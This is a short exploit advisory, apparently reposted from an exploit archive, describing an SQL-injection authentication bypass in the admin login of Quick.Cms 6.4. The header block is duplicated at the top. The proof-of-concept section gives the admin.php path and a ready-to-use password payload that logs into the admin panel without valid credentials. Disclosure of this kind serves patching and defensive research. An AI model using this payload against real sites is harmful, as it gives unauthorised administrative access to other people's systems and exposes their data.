___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team ___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)
| Vendor Homepage: http://opensolution.org
| Software Link:
http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE: N/A
| Dork: N/A
|__________________________________________________
The vulnerability is in the login area of Quick.Cms_v6.4,
where we can enter the panel only using some parameters such as
password
__________________________________________________
Proof of Concept :
http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass:
'=''or'
__________________________________________________
Discovered By : Ashiyane Digital security Team
__________________________________________________
Quick CMS 6.4 SQL Injection Authentication Bypass
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 373